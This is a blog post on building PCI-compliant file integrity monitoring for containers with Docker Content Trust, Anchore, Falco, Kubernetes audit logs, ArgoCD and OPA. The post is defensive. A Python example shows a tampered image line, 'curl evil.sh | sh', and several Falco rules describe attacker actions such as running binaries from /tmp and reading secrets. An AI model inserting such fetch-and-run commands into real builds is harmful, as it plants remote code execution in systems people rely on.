A question I hear often is: “How do we manage PCI compliance for containers when they’re destroyed and recreated constantly?”
It’s a legitimate concern. In this post I cover file integrity monitoring (FIM) for containerized environments (e.g., Docker and Kubernetes). Traditional FIM tools were built for static servers that run for months or years. But containers? They live for minutes, hours, maybe days.
The PCI-DSS standard doesn’t give you a pass just because you’re using modern infrastructure. Requirement 11.5.2 still applies: you still need to detect unauthorized file modifications. The approach just looks completely different.
I’ve learned that success comes from understanding one key principle: in containerized environments, your “critical files” aren’t just files anymore; they’re images, runtime behavior, and Kubernetes configurations.
Let me show you how to build comprehensive file integrity monitoring for Docker and Kubernetes that actually works and passes PCI audits.
Why Traditional FIM Fails for Containers
Before we dive into solutions, let’s understand why your existing FIM strategy breaks in containerized environments.
The fundamental problem: Containers are designed to be ephemeral and immutable. When you deploy a container, you’re not supposed to modify its files. If you need to change something, you build a new image and redeploy. This “immutable infrastructure” pattern is actually great for security, but it means traditional file monitoring doesn’t make sense.
Think about it: If you use a traditional FIM tool inside a container and it detects that /etc/nginx/nginx.conf changed, what does that tell you? In a VM, that might be unauthorized tampering. In a container, it could mean:
- Someone is violating immutable infrastructure principles (bad)
- The application legitimately writes to that path (maybe okay)
- The container is under attack (definitely bad)
- Or it’s just normal container startup behavior (totally fine)
You need context that traditional FIM can’t provide.
Additional challenges:
- Scale: You might have 500 containers across 100 nodes. Traditional per-host FIM doesn’t scale.
- Layered filesystems: Container images are built in layers. Which layer changed? Was it in the base image or added at runtime?
- Shared resources: Multiple containers sharing the same underlying host make attribution difficult.
The solution is a three-layer approach that monitors the entire container lifecycle: build time, runtime, and orchestration.
The Three-Layer Container FIM Strategy
I’ve found that successful container FIM requires monitoring at three distinct layers, each serving a different purpose:
Layer 1: Container Images (Build-Time Integrity) This is where you ensure that only authorized, verified images run in your environment. Think of this as “preventive FIM”: stopping bad images before they ever start.
Layer 2: Runtime File Changes (Drift Detection) Once containers are running, you monitor for unexpected file modifications, process executions, and behavior that deviates from the image definition. This is “detective FIM” for active containers.
Layer 3: Kubernetes Configuration (Control Plane Monitoring) Your Kubernetes configs (deployments, secrets, network policies, RBAC) are just as critical as files on disk. Changes here can be just as damaging as modified binaries.
Let’s explore each layer in detail.
Layer 1: Container Image Integrity
The first line of defense is ensuring that container images themselves haven’t been tampered with. If you can guarantee that only signed, verified images run in your environment, you’ve already prevented a huge category of attacks.
Image Signing and Verification
Docker Content Trust is the standard way to cryptographically sign container images. When enabled, Docker won’t pull or run unsigned images; it’s like code signing for containers.
Here’s how it works in practice. When you enable Docker Content Trust, every image push requires a signature:
# Enable Docker Content Trust globally
export DOCKER_CONTENT_TRUST=1
# With Content Trust enabled, docker push signs automatically;
# you can also sign an existing image explicitly:
docker trust sign myregistry.com/payment-app:v1.0
# When pulling, verification happens automatically
docker pull myregistry.com/payment-app:v1.0
# This will fail if the signature is invalid or missing

The beauty of this approach is that it’s transparent once configured. Developers can’t accidentally (or maliciously) push unsigned images. QSAs love this because it provides cryptographic proof that images haven’t been modified since they were built and signed by your CI/CD pipeline.
For your PCI audit: Show the assessor that Docker Content Trust is enabled on all production systems and demonstrate that unsigned images are rejected. Keep logs of signature verification; these serve as your FIM evidence for the image layer.
Immutable Image References
Another critical practice is deploying containers using their cryptographic digest (SHA256 hash) rather than tags. Tags like v1.0 or latest are mutable: someone could push a new image with the same tag. But a digest is immutable; it’s a hash of the exact image contents.
When you deploy using a digest, you’re guaranteed to get the exact same bits every time:
# Get the digest of an image
docker images --digests
# Deploy using the digest (notice the @sha256: syntax)
docker pull myregistry.com/payment-app@sha256:abc123def456...

In Kubernetes, this looks like:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: payment-app
spec:
  template:
    spec:
      containers:
      - name: app
        # Pin by digest - this exact image version, forever
        image: myregistry.com/payment-app@sha256:abc123def456...

This might seem overly paranoid, but I’ve seen incidents where attackers compromised a container registry and pushed malicious images with the same tag as legitimate ones. If you’re deploying by tag, you’ll pull the malicious image. If you’re deploying by digest, you’re protected.
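Under the hood a digest is just a SHA-256 hash of content (Docker specifically hashes the image manifest), so a pinned reference can never silently point at different bits. A minimal Python sketch of the principle, not Docker’s actual manifest hashing:

```python
import hashlib

def digest(blob: bytes) -> str:
    """Content-addressed reference, analogous to an image digest."""
    return "sha256:" + hashlib.sha256(blob).hexdigest()

image_v1 = b"FROM alpine:3.19\nCOPY app /app\n"
tampered = b"FROM alpine:3.19\nCOPY app /app\nRUN curl evil.sh | sh\n"

# Any change to the contents produces a different digest, so a pinned
# digest can never be swapped out the way a mutable tag can.
assert digest(image_v1) != digest(tampered)
assert digest(image_v1) == digest(image_v1)  # deterministic
print(digest(image_v1))
```

A registry can repoint a tag at new content, but it cannot produce different content that hashes to the same digest.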
Automated Image Scanning with Anchore
While signing and digest pinning prevent tampering, you also need to understand what’s actually in your images. Anchore Engine is an open-source tool that analyzes container images and can detect changes between versions.
After installing Anchore (which runs as a set of containers itself), you can scan images as they’re built:
# Install Anchore using Docker Compose
docker-compose -f docker-compose-anchore.yaml up -d
# Add an image for analysis
anchore-cli image add myregistry.com/payment-app:latest
# Wait for the analysis to complete
anchore-cli image wait myregistry.com/payment-app:latest
# Get a complete list of files in the image
anchore-cli image content myregistry.com/payment-app:latest files
# Compare two versions to see what changed
anchore-cli image diff myregistry.com/payment-app:v1.0 myregistry.com/payment-app:v1.1

That last command is incredibly powerful for FIM purposes. It shows you exactly what files were added, modified, or deleted between image versions. During a PCI audit, you can demonstrate that you have automated detection of image changes and a process for reviewing them.
You can even create policies that enforce specific file integrity requirements. For example, here’s an Anchore policy that alerts if /etc/passwd is modified in an image:
{
  "id": "pci_fim_policy",
  "name": "PCI-DSS File Integrity Policy",
  "version": "1.0",
  "rules": [
    {
      "action": "STOP",
      "gate": "files",
      "trigger": "content_regex_match",
      "params": [
        {
          "name": "path",
          "value": "/etc/passwd"
        },
        {
          "name": "check",
          "value": ".*"
        }
      ]
    },
    {
      "action": "WARN",
      "gate": "files",
      "trigger": "suid_or_sgid_set",
      "params": []
    }
  ]
}

Layer 2: Runtime Container Monitoring
Once containers are running, you need visibility into their behavior. This is where runtime security tools come in: they monitor container activity and alert when something deviates from expected behavior.
Falco: The Gold Standard for Container Runtime Security
Falco is an open-source runtime security tool originally created by Sysdig and now a CNCF project. Think of it as an intrusion detection system specifically designed for containers and Kubernetes.
Falco works by tapping into the Linux kernel (via eBPF or kernel module) and monitoring system calls. It knows when processes start, when files are opened, and when network connections are made: everything happening in your containers.
The installation is straightforward, especially on Kubernetes:
# Add the Falco Helm repository
helm repo add falcosecurity https://falcosecurity.github.io/charts
# Install Falco as a DaemonSet (runs on every node)
helm install falco falcosecurity/falco \
  --namespace falco \
  --create-namespace

Once installed, Falco continuously monitors container activity. But the real power comes from the rules you configure. Here’s a rule that detects writes to sensitive files inside containers:
# Detect writes to critical files in containers
- rule: Write to sensitive file in container
  desc: Detect writes to critical files (PCI-DSS 11.5.2)
  condition: >
    container and
    open_write and
    (fd.name in (/etc/passwd, /etc/shadow, /etc/sudoers) or
     fd.name startswith /app/config/ or
     fd.name startswith /opt/payment-app/)
  output: >
    Critical file write in container
    (user=%user.name container=%container.name
    file=%fd.name command=%proc.cmdline)
  priority: CRITICAL
  tags: [pci_dss_11.5.2, filesystem, container]

Let me break down what this rule does. It triggers when:
- The event happens inside a container (the `container` condition)
- A file is opened for writing (`open_write`)
- The file path matches sensitive locations (system files or application configs)
When triggered, Falco outputs detailed context: who made the change, which container, what file, and what command caused it. This is exactly the kind of evidence QSAs want to see for file integrity monitoring.
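With json_output: true, each triggered rule produces a structured event you can parse downstream. A sketch of consuming one; the sample alert is illustrative, and the exact field layout varies by Falco version:

```python
import json

# Illustrative alert shaped like Falco's JSON output for the rule above
# (rule name and field names follow that rule; values are made up).
raw = '''{
  "rule": "Write to sensitive file in container",
  "priority": "Critical",
  "output_fields": {
    "user.name": "root",
    "container.name": "payment-app",
    "fd.name": "/etc/passwd",
    "proc.cmdline": "bash -c echo x >> /etc/passwd"
  }
}'''

alert = json.loads(raw)
fields = alert["output_fields"]
# The four answers a QSA asks for: who, where, what, and how.
summary = (f'{alert["priority"]}: {fields["user.name"]} wrote '
           f'{fields["fd.name"]} in {fields["container.name"]} '
           f'via "{fields["proc.cmdline"]}"')
print(summary)
```

This is the kind of normalization step a SIEM ingest pipeline typically performs before correlation.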
Here are a few more practical Falco rules for PCI compliance:
Detect package manager execution in running containers:
- rule: Package management in container
  desc: Package manager run after container start (drift detection)
  condition: >
    container and
    spawned_process and
    package_mgmt_procs and
    container_started
  output: >
    Package manager run in running container
    (user=%user.name container=%container.name
    command=%proc.cmdline)
  priority: ERROR
  tags: [pci_dss_11.5.2, package_management]

Why does this matter? In immutable infrastructure, you should never run apt-get install or yum install in a running container. If you need to install something, you rebuild the image. If Falco sees package manager activity, it means someone is violating immutability, or worse, that an attacker is installing tools.
Detect binary execution from temporary directories:
- rule: Binary executed from tmp
  desc: Unauthorized binary in /tmp (potential compromise)
  condition: >
    container and
    spawned_process and
    proc.pname != null and
    fd.name startswith /tmp and
    proc.is_exe_writable=true
  output: >
    Binary executed from /tmp in container
    (user=%user.name container=%container.name
    command=%proc.cmdline file=%fd.name)
  priority: WARNING
  tags: [pci_dss_11.5.2, execution]

Attackers often drop and execute payloads from /tmp because it’s usually writable. This rule catches that behavior.

Monitor configuration file modifications:
- rule: Configuration file modified
  desc: Application config changed at runtime
  condition: >
    container and
    open_write and
    (fd.name startswith /etc/nginx/ or
     fd.name startswith /etc/mysql/ or
     fd.name startswith /app/config/)
  output: >
    Configuration file modified in container
    (user=%user.name container=%container.name
    file=%fd.name command=%proc.cmdline)
  priority: WARNING
  tags: [pci_dss_11.5.2, configuration]

This catches runtime modifications to application configs. In a properly designed container, configs should be read-only or injected via ConfigMaps, not modified at runtime.
The final piece is forwarding Falco alerts to your SIEM. Configure Falco to output JSON and send it to Splunk, Elasticsearch, or wherever you aggregate security events:
# Enable JSON output
json_output: true
json_include_output_property: true

# Send to Splunk HTTP Event Collector
http_output:
  enabled: true
  url: "https://splunk.company.com:8088/services/collector"

# Or send to Slack for real-time notifications
program_output:
  enabled: true
  program: "jq '{text: .output}' | curl -X POST -H 'Content-type: application/json' --data @- https://hooks.slack.com/services/YOUR/WEBHOOK/URL"

Now you have real-time alerting on container file changes with full context about what happened, who did it, and which container was affected.
Alternative: Wazuh Sidecar Pattern
If you’re already using Wazuh for traditional FIM on VMs, you can extend it to containers using the sidecar pattern. A sidecar is an additional container that runs alongside your application container in the same pod.
Here’s how you’d deploy a Wazuh agent as a sidecar:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: payment-app
spec:
  template:
    spec:
      containers:
      # Main application container
      - name: payment-app
        image: myregistry.com/payment-app:v1.0
        volumeMounts:
        - name: app-data
          mountPath: /app/data
        - name: app-config
          mountPath: /app/config
      # Wazuh FIM sidecar container
      - name: wazuh-agent
        image: wazuh/wazuh-agent:latest
        env:
        - name: WAZUH_MANAGER
          value: "wazuh-manager.security.svc.cluster.local"
        volumeMounts:
        # Mount the same volumes to monitor them
        - name: app-data
          mountPath: /shared/app/data
          readOnly: true
        - name: app-config
          mountPath: /shared/app/config
          readOnly: true
        - name: wazuh-config
          mountPath: /var/ossec/etc/ossec.conf
          subPath: ossec.conf
      volumes:
      - name: app-data
        emptyDir: {}
      - name: app-config
        configMap:
          name: app-config
      - name: wazuh-config
        configMap:
          name: wazuh-container-config

The Wazuh sidecar can access the same volumes as your application and monitor them for changes. Configure it to watch your critical files:
<!-- Wazuh configuration for containers -->
<syscheck>
  <frequency>3600</frequency>
  <alert_new_files>yes</alert_new_files>

  <!-- Monitor shared volumes -->
  <directories check_all="yes" realtime="yes">/shared/app/config</directories>
  <directories check_all="yes" realtime="yes">/shared/app/data</directories>

  <!-- Container-specific paths -->
  <directories check_all="yes">/etc/nginx</directories>
  <directories check_all="yes">/etc/mysql</directories>
</syscheck>

The sidecar approach works well if you’re already invested in Wazuh. The downside is that it adds overhead (an extra container per pod) and only monitors shared volumes, not the entire container filesystem.
Layer 3: Kubernetes Configuration Monitoring
This is the layer most organizations miss entirely, and it’s a huge gap in their PCI compliance.
When you deploy on Kubernetes, your “critical configuration files” aren’t just /etc/nginx/nginx.conf anymore. They’re Kubernetes manifests: Deployments, Services, ConfigMaps, Secrets, NetworkPolicies, RBAC rules. Changes to these objects can be just as impactful as file modifications on a server.
Imagine someone modifies a NetworkPolicy to allow unrestricted egress traffic from your payment processing pods. Or they change a Secret to inject malicious credentials. Or they add a ClusterRole that gives a service account cluster-admin privileges. Traditional file integrity monitoring won’t catch any of this.
Kubernetes Audit Logs: Your Control Plane FIM
Kubernetes has a built-in audit logging system that records every API request. When someone creates, updates, or deletes a resource, it’s logged. This is your equivalent of file integrity monitoring for Kubernetes objects.
First, you need to enable audit logging by creating an audit policy. This defines what events get logged and at what detail level:
# /etc/kubernetes/audit-policy.yaml
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
# Log all changes to ConfigMaps and Secrets
- level: RequestResponse
  verbs: ["create", "update", "patch", "delete"]
  resources:
  - group: ""
    resources: ["configmaps", "secrets"]
# Log all changes to Deployments
- level: RequestResponse
  verbs: ["create", "update", "patch", "delete"]
  resources:
  - group: "apps"
    resources: ["deployments", "statefulsets", "daemonsets"]
# Log all RBAC changes (critical for access control)
- level: RequestResponse
  verbs: ["create", "update", "patch", "delete"]
  resources:
  - group: "rbac.authorization.k8s.io"
    resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]
# Log NetworkPolicy changes
- level: RequestResponse
  verbs: ["create", "update", "patch", "delete"]
  resources:
  - group: "networking.k8s.io"
    resources: ["networkpolicies"]

Let me explain the key parts:
- level: RequestResponse logs both the request (what change was requested) and the response (what actually happened)
- verbs: ["create", "update", "patch", "delete"] captures all modification operations
- resources specifies which Kubernetes object types to monitor
Once you’ve created the policy, configure the Kubernetes API server to use it:
# Add these flags to kube-apiserver
spec:
  containers:
  - command:
    - kube-apiserver
    - --audit-policy-file=/etc/kubernetes/audit-policy.yaml
    - --audit-log-path=/var/log/kubernetes/audit.log
    - --audit-log-maxage=30    # Keep 30 days of logs
    - --audit-log-maxbackup=10 # Keep 10 backup files
    - --audit-log-maxsize=100  # Max 100MB per file

Now every change to your Kubernetes resources is logged. Here’s what an audit log entry looks like when someone modifies a ConfigMap:
{
  "kind": "Event",
  "apiVersion": "audit.k8s.io/v1",
  "level": "RequestResponse",
  "auditID": "abc-123-def-456",
  "stage": "ResponseComplete",
  "requestURI": "/api/v1/namespaces/payment-namespace/configmaps/app-config",
  "verb": "patch",
  "user": {
    "username": "john@company.com",
    "groups": ["system:authenticated"]
  },
  "sourceIPs": ["10.0.1.50"],
  "userAgent": "kubectl/v1.28.0",
  "objectRef": {
    "resource": "configmaps",
    "namespace": "payment-namespace",
    "name": "app-config"
  },
  "responseStatus": {
    "code": 200
  },
  "requestObject": {
    "data": {
      "database_url": "postgresql://newhost:5432/db"
    }
  },
  "responseObject": {
    "data": {
      "database_url": "postgresql://newhost:5432/db"
    }
  }
}

This gives you everything: who made the change, what they changed, when they changed it, and what the new value is. For PCI compliance, this is gold: complete traceability of configuration changes.
Forward these audit logs to your SIEM for centralized monitoring and alerting.
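A common pattern when forwarding is to pre-filter, alerting only on mutating verbs against CDE namespaces rather than shipping every read. A minimal sketch, assuming the audit-entry shape shown above (namespace names are examples):

```python
import json

MUTATING_VERBS = {"create", "update", "patch", "delete"}
CDE_NAMESPACES = {"payment-namespace", "cde-namespace"}  # example names

def needs_alert(event: dict) -> bool:
    """Flag mutating API calls against CDE namespaces for SIEM alerting."""
    ref = event.get("objectRef", {})
    return (event.get("verb") in MUTATING_VERBS
            and ref.get("namespace") in CDE_NAMESPACES)

# Sample entry shaped like the audit log above
event = json.loads('''{
  "verb": "patch",
  "user": {"username": "john@company.com"},
  "objectRef": {"resource": "configmaps",
                "namespace": "payment-namespace",
                "name": "app-config"}
}''')

assert needs_alert(event)                                     # mutation in CDE
assert not needs_alert({"verb": "get",
                        "objectRef": {"namespace": "payment-namespace"}})
```

Filtering at the edge keeps SIEM ingest volume (and cost) down while preserving the events that matter for Requirement 11.5.2.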
Falco for Kubernetes Configuration Changes
Falco can also monitor Kubernetes API activity in real-time. While audit logs provide a complete record, Falco gives you immediate alerts on suspicious changes.
Here are some Falco rules specifically for Kubernetes FIM:
# Alert when ConfigMaps are modified
- rule: ConfigMap Modified
  desc: ConfigMap changed (potential config drift)
  condition: >
    kevt and
    ka.verb in (create, update, patch) and
    ka.target.resource=configmaps and
    ka.target.namespace in (payment-namespace, cde-namespace)
  output: >
    ConfigMap modified
    (user=%ka.user.name namespace=%ka.target.namespace
    configmap=%ka.target.name verb=%ka.verb)
  priority: WARNING
  tags: [k8s, pci_dss_11.5.2]

This rule fires whenever someone creates or updates a ConfigMap in your payment processing namespaces. You get real-time Slack or email notifications.
Alert on Secret access:
- rule: Secret Read
  desc: Secret accessed (monitoring for data exfiltration)
  condition: >
    kevt and
    ka.verb=get and
    ka.target.resource=secrets
  output: >
    Secret accessed
    (user=%ka.user.name namespace=%ka.target.namespace
    secret=%ka.target.name)
  priority: INFO
  tags: [k8s, secrets]

Detect overly permissive RBAC:
- rule: ClusterRole with Wildcard Created
  desc: Overly permissive RBAC created
  condition: >
    kevt and
    ka.verb=create and
    ka.target.resource=clusterroles and
    ka.req.clusterrole.rules.resources contains "*"
  output: >
    Dangerous ClusterRole created with wildcard permissions
    (user=%ka.user.name clusterrole=%ka.target.name)
  priority: CRITICAL
  tags: [k8s, rbac, pci_dss_7.2]

ClusterRoles with wildcard permissions (resources: ["*"]) grant access to everything. This rule catches when someone creates such a role, which is often a sign of privilege escalation.
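The same wildcard check is cheap to run offline too, e.g., in CI against exported manifests before they ever reach the cluster. A sketch of the logic (illustrative, not part of Falco):

```python
def has_wildcard(cluster_role: dict) -> bool:
    """True if any RBAC rule grants '*' on resources, verbs, or apiGroups."""
    for rule in cluster_role.get("rules", []):
        for field in ("resources", "verbs", "apiGroups"):
            if "*" in rule.get(field, []):
                return True
    return False

risky = {"kind": "ClusterRole",
         "metadata": {"name": "do-everything"},
         "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]}
scoped = {"kind": "ClusterRole",
          "metadata": {"name": "pod-reader"},
          "rules": [{"apiGroups": [""], "resources": ["pods"],
                     "verbs": ["get", "list"]}]}

assert has_wildcard(risky)       # flag for review
assert not has_wildcard(scoped)  # least-privilege role passes
```

Running this in CI gives you a preventive check to complement Falco's detective one.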
GitOps: Infrastructure-as-Code FIM
The most elegant solution for Kubernetes configuration integrity is GitOps. With tools like ArgoCD or FluxCD, you declare all your Kubernetes resources in a Git repository, and the GitOps controller ensures the cluster state matches what’s in Git.
Here’s why this is powerful for FIM: Git becomes your single source of truth. Any change to Kubernetes resources must go through a Git commit, which gives you:
- Complete audit trail: Git history shows who changed what, when, and why
- Code review: Pull requests ensure changes are reviewed before deployment
- Drift detection: If someone makes a manual kubectl change, ArgoCD detects it as “drift”
- Automatic remediation: ArgoCD can auto-sync, reverting unauthorized changes
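Conceptually, drift detection is just a diff between desired state (what Git declares) and live state (what the cluster is running). A toy sketch of the idea; ArgoCD's real diffing operates on full Kubernetes objects:

```python
# Desired state comes from the manifest in Git; live state from the cluster.
desired = {"image": "myregistry.com/payment-app@sha256:abc123",
           "replicas": 3}
live = {"image": "myregistry.com/payment-app@sha256:abc123",
        "replicas": 5}  # someone ran a manual kubectl scale

# Drift = every field where live state disagrees with Git.
drift = {k: (desired[k], live[k])
         for k in desired if desired[k] != live.get(k)}
print(drift)  # {'replicas': (3, 5)}

# Self-heal is simply: apply the desired value back.
live.update({k: want for k, (want, _have) in drift.items()})
assert live == {"image": "myregistry.com/payment-app@sha256:abc123",
                "replicas": 3}
```

The manual scale shows up as drift, and "self-heal" reduces to reapplying what Git says.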
Your Git repository might look like:
payment-app/
├── base/
│ ├── deployment.yaml
│ ├── service.yaml
│ ├── configmap.yaml
│ └── secret.yaml (encrypted with sealed-secrets)
└── overlays/
    └── production/
        └── kustomization.yaml

ArgoCD continuously monitors this repository. If someone commits a change to deployment.yaml, ArgoCD deploys it. If someone makes a manual change directly to the cluster, ArgoCD detects drift:
# Check for drift (cluster state vs. Git)
argocd app diff payment-app
# Enable auto-sync to enforce Git as source of truth
argocd app set payment-app --sync-policy automated --self-heal

With auto-sync enabled, ArgoCD reverts any manual changes back to what’s defined in Git. This is FIM with automatic remediation built in.
For PCI compliance, you can show assessors:
- Git commit history as your audit trail of configuration changes
- ArgoCD logs showing drift detection and auto-remediation
- Pull request records demonstrating change approval workflow
Set up webhooks to alert on Git commits:
# GitHub webhook → Slack on commit to production configs
curl -X POST https://hooks.slack.com/services/YOUR/WEBHOOK \
-d '{
"text": "K8s Config Changed",
"attachments": [{
"title": "Commit: Payment App Deployment",
"text": "User: john@company.com\nFile: deployment.yaml\nChange: Image updated to v1.2.3"
}]
  }'

Now every configuration change generates a Slack notification in real time.
Open Policy Agent: Preventive Configuration Control
While the previous approaches detect unauthorized changes, Open Policy Agent (OPA) prevents them from happening in the first place. OPA acts as an admission controller: it intercepts Kubernetes API requests and can reject them based on policy.
For example, you can create a policy that requires all images to use digest references:
# opa-policy.rego
package kubernetes.admission
# Deny if image doesn't use digest
deny[msg] {
  input.request.kind.kind == "Pod"
  image := input.request.object.spec.containers[_].image
  not contains(image, "@sha256:")
  msg := sprintf("Image must use digest: %v", [image])
}

When someone tries to deploy a pod with image: myapp:latest, OPA rejects it. They must use image: myapp@sha256:abc123... instead. This enforces immutable image references at the admission layer.
Other useful OPA policies for PCI:
Prevent privileged containers:
deny[msg] {
  input.request.kind.kind == "Pod"
  input.request.object.spec.containers[_].securityContext.privileged == true
  msg := "Privileged containers not allowed in CDE"
}

Require resource limits:
deny[msg] {
  input.request.kind.kind == "Pod"
  container := input.request.object.spec.containers[_]
  not container.resources.limits
  msg := sprintf("Container %v missing resource limits", [container.name])
}

Deploy OPA using Gatekeeper (OPA’s Kubernetes-native implementation):
# Install Gatekeeper
kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/master/deploy/gatekeeper.yaml
# Apply your policies
kubectl apply -f opa-constraint-template.yaml
kubectl apply -f opa-constraint.yaml

OPA provides preventive control: bad configurations never make it into the cluster. Combined with audit logs and Falco for detective control, you have defense in depth.
The Complete Architecture
Let me tie this all together. Here’s what a complete container FIM architecture looks like:
┌──────────────────────────────────────────────────────────────┐
│ LAYER 1: Image Build Time │
│ ┌─────────────┐ ┌───────────────┐ ┌────────────────┐ │
│ │ Anchore │ │ Docker Content│ │ Notary Server │ │
│ │ Engine │ │ Trust │ │ (Signatures) │ │
│ └─────────────┘ └───────────────┘ └────────────────┘ │
│ │
│ Purpose: Ensure only signed, scanned images reach prod │
└──────────────────────────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────┐
│ LAYER 2: Container Runtime │
│ ┌─────────────┐ ┌──────────────┐ ┌────────────────┐ │
│ │ Falco │ │ Sysdig │ │ Wazuh Sidecar │ │
│ │ (Runtime) │ │ Secure │ │ FIM │ │
│ └─────────────┘ └──────────────┘ └────────────────┘ │
│ │
│ Purpose: Detect file changes and anomalous behavior │
└──────────────────────────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────┐
│ LAYER 3: Kubernetes Control Plane │
│ ┌─────────────┐ ┌──────────────┐ ┌─────────────────┐ │
│ │ K8s Audit │ │ Falco (K8s) │ │ ArgoCD (GitOps │ │
│ │ Logs │ │ Rules │ │ Drift Detect) │ │
│ └─────────────┘ └──────────────┘ └─────────────────┘ │
│ │
│ Purpose: Monitor infrastructure configuration changes │
└──────────────────────────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────┐
│ SIEM Integration (Splunk / ELK / Sentinel) │
│ │
│ Centralized alerting, correlation, and compliance reporting │
└──────────────────────────────────────────────────────────────┘

Each layer serves a specific purpose:
- Layer 1 prevents compromised images from entering your environment
- Layer 2 detects runtime tampering and anomalous behavior
- Layer 3 catches infrastructure configuration changes
Together, they provide comprehensive file integrity monitoring that actually works in containerized environments.
What Your QSA Needs to See
When your PCI assessor shows up, they’ll ask for evidence that you’re monitoring critical files. Here’s what you should have ready:
Evidence Package Structure
Container-FIM-Evidence/
├── 1-Image-Integrity/
│ ├── docker-content-trust-enabled.txt
│ ├── image-digests-list.txt
│ ├── anchore-scan-results.json
│ ├── notary-signatures.txt
│ └── registry-access-logs.txt
│
├── 2-Runtime-Monitoring/
│ ├── falco-rules.yaml
│ ├── falco-alerts-sample.json
│ ├── wazuh-sidecar-config.xml
│ └── sysdig-policy-screenshot.png
│
├── 3-Kubernetes-Config/
│ ├── k8s-audit-policy.yaml
│ ├── k8s-audit-log-sample.json
│ ├── argocd-drift-detection.txt
│ ├── opa-policies.rego
│ └── git-commit-history.txt
│
├── 4-Alert-Evidence/
│ ├── sample-falco-alert-email.eml
│ ├── splunk-correlation-rule.spl
│ ├── slack-webhook-config.txt
│ └── servicenow-ticket-INC123456.pdf
│
└── 5-Review-Process/
├── weekly-fim-review-notes-Q1-2026.pdf
├── incident-response-playbook.pdf
    └── change-management-approvals.xlsx

What each section demonstrates:
1. Image Integrity: Proves you verify image authenticity before deployment
- Show that Docker Content Trust is enabled globally
- Provide a list of production images with their SHA256 digests
- Include Anchore scan results showing no unexpected file modifications
- Document image signing workflow
2. Runtime Monitoring: Proves you detect file changes in running containers
- Provide Falco rules configured for your environment
- Include sample alerts showing the system works
- Show SIEM integration (how alerts are routed)
3. Kubernetes Config: Proves you monitor infrastructure changes
- Show audit policy configuration
- Provide sample audit log entries for ConfigMap/Secret/Deployment changes
- Demonstrate GitOps drift detection
- Show OPA policies preventing unauthorized configurations
4. Alert Evidence: Proves alerts actually reach someone who acts on them
- Sample email alerts from Falco
- Slack notifications
- SIEM correlation rules
- ServiceNow tickets showing investigation of alerts
5. Review Process: Proves someone reviews and acts on FIM data
- Weekly review meeting notes
- Incident response procedures
- Examples of approved changes (with change tickets)
- Examples of detected unauthorized changes (with investigation records)
The assessor will want to see not just that you have the tools, but that you’re actually using them. The review process documentation is critical: it shows that FIM isn’t just checkbox compliance, but an active part of your security operations.
Best Practices Summary
Here’s what separates successful deployments from those that fail audits:
DO:
- ✅ Use image digests everywhere. Tag names are mutable; digests aren’t. Pin production deployments to specific SHA256 hashes.
- ✅ Sign all production images. Enable Docker Content Trust and make unsigned images undeployable.
- ✅ Deploy Falco with custom rules. The default rules are good, but tailor them to your specific applications and compliance requirements.
- ✅ Enable Kubernetes audit logs. This is non-negotiable for PCI compliance. Without audit logs, you have no record of infrastructure changes.
- ✅ Use GitOps for all configurations. Make Git the single source of truth. Manual kubectl commands should be exceptional, not routine.
- ✅ Alert on container drift. If files change at runtime, something’s wrong. Containers should be immutable.
- ✅ Monitor RBAC changes religiously. Privilege escalation often happens through RBAC modifications.
- ✅ Document everything. Your future self (and your auditor) will thank you.
DON’T:
- ❌ Use :latest tags in production. It’s the container equivalent of SELECT * FROM passwords WHERE 1=1. Just don’t.
- ❌ Allow privilege escalation in containers. If a container needs root, you’ve probably designed it wrong.
- ❌ Skip image scanning. Anchore or equivalent should be mandatory in your CI/CD pipeline.
- ❌ Ignore runtime file writes. In immutable infrastructure, file writes at runtime are anomalies worth investigating.
- ❌ Make manual kubectl changes. Use GitOps. Manual changes bypass your audit trail.
- ❌ Run containers as root. Use USER directive in Dockerfiles to run as non-root. PCI assessors will check this.
- ❌ Forget to test your alerts. Periodically trigger a Falco rule intentionally to verify alerts reach the right people.
Quick Start: Getting FIM Running Today
If you want to get basic container FIM running quickly, here’s a script that sets up the essentials:
#!/bin/bash
# quick-container-fim-setup.sh
echo "[*] Setting up container FIM..."
# 1. Install Falco for runtime monitoring
echo "[*] Installing Falco..."
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm install falco falcosecurity/falco \
--namespace falco \
--create-namespace \
--set falco.jsonOutput=true
# 2. Enable Kubernetes Audit Logs
echo "[*] Configuring K8s audit policy..."
kubectl apply -f k8s-audit-policy.yaml
# 3. Install ArgoCD for GitOps
echo "[*] Installing ArgoCD..."
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/stable/manifests/install.yaml
# 4. Enable Docker Content Trust globally
echo "[*] Enabling Docker Content Trust..."
export DOCKER_CONTENT_TRUST=1
echo 'export DOCKER_CONTENT_TRUST=1' >> ~/.bashrc
echo ""
echo "[+] Container FIM setup complete!"
echo ""
echo "Next steps:"
echo " 1. Configure Falco rules for your applications"
echo " 2. Set up image signing workflow in CI/CD"
echo " 3. Configure audit log forwarding to SIEM"
echo " 4. Create Git repository for K8s manifests"
echo " 5. Test alert delivery (Slack/email/ServiceNow)"
echo ""
echo "Documentation: https://cybersecpro.me/blog/docker-kubernetes-fim/"

This gives you the foundation. From here, customize Falco rules, set up SIEM forwarding, and integrate with your existing security stack.
Final Thoughts
Container FIM is fundamentally different from traditional file integrity monitoring, but the underlying goal is the same: detect unauthorized changes before they cause damage.
The key insight is understanding that in containerized environments, “files” exist at multiple layers:
- Images (build time)
- Running container filesystems (runtime)
- Kubernetes manifests (control plane)
Traditional FIM only covers the middle layer, and often does it poorly. A comprehensive approach monitors all three.
The good news? Container platforms give you better visibility than traditional infrastructure ever did. Every API call is logged. Every system call can be monitored. Every deployment goes through version control. You just need to wire it up correctly.
Start with the basics: image signing, Falco, and audit logs. Build from there. Within a few weeks, you’ll have FIM coverage that’s not just compliant, but actually useful for detecting and responding to threats.
And when your QSA asks, “How do you monitor file integrity in your containerized CDE?”, you’ll have a great answer.
Thoughts or corrections? Hit me up on LinkedIn or e-mail.